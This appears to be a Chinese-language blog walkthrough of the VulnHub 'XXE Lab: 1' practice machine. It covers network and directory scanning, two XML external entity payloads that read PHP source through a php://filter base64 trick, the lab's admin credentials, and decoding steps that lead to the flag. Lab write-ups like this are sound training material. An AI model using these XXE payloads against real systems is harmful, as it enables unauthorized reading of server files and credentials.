vulnhub靶机:xxe

目录

靶机导入

信息收集

发现IP

端口扫描

目录扫描

漏洞利用


靶机下载地址:XXE Lab: 1 ~ VulnHub

靶机导入

导入虚拟机

开启虚拟机

信息收集

发现IP

arp-scan -l

发现靶机IP是192.168.202.150

端口扫描

使用nmap进行扫描

nmap -sS -A 192.168.202.150

只开放了80端口

访问浏览器

发现是默认apache2页面,进行目录扫描

目录扫描

使用dirsearch工具扫描目录

dirsearch -u http://192.168.202.150/ -x 403

发现robots.txt

漏洞利用

访问robots.txt

发现网址后台,再访问:

因为是xxe靶场,于是猜测登录是用xml数据传输,使用burp抓取登录包内容

发现是xml格式,于是构造poc

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>

访问本地xxe.php的源码,用base64格式输出,解码得

并无发现,同样的方法查看admin.php

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>

base64解码得(部分有用信息):

得到登录密码,因为是在admin.php的源码里于是访问admin.php网址

username:administhebest
password:e6e061838856bf47e1de730719fb2609

password用md5解密得:admin@123

访问后台

点击flag发现404错误,但是有新的文件名

再依靠上面的xxe漏洞查看flagmeout.php的源码

base64解密得

全是大写字母和数字,猜测是base32加密,再解密

把base32解密后的结果再base64解密得到一个路径

再次依靠上面的xxe漏洞读取源代码

base64解密得到

看不懂,应该是flag.php里的内容,猜测是php代码,于是放入在线的php环境或者自己的 网站查看

注意!php解析器版本是php5才能正常解析出flag,版本过高都会显示不出flag

把它放进记事本改为php文件,放在小蓝皮根目录访问,得到了flag

  • 21
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值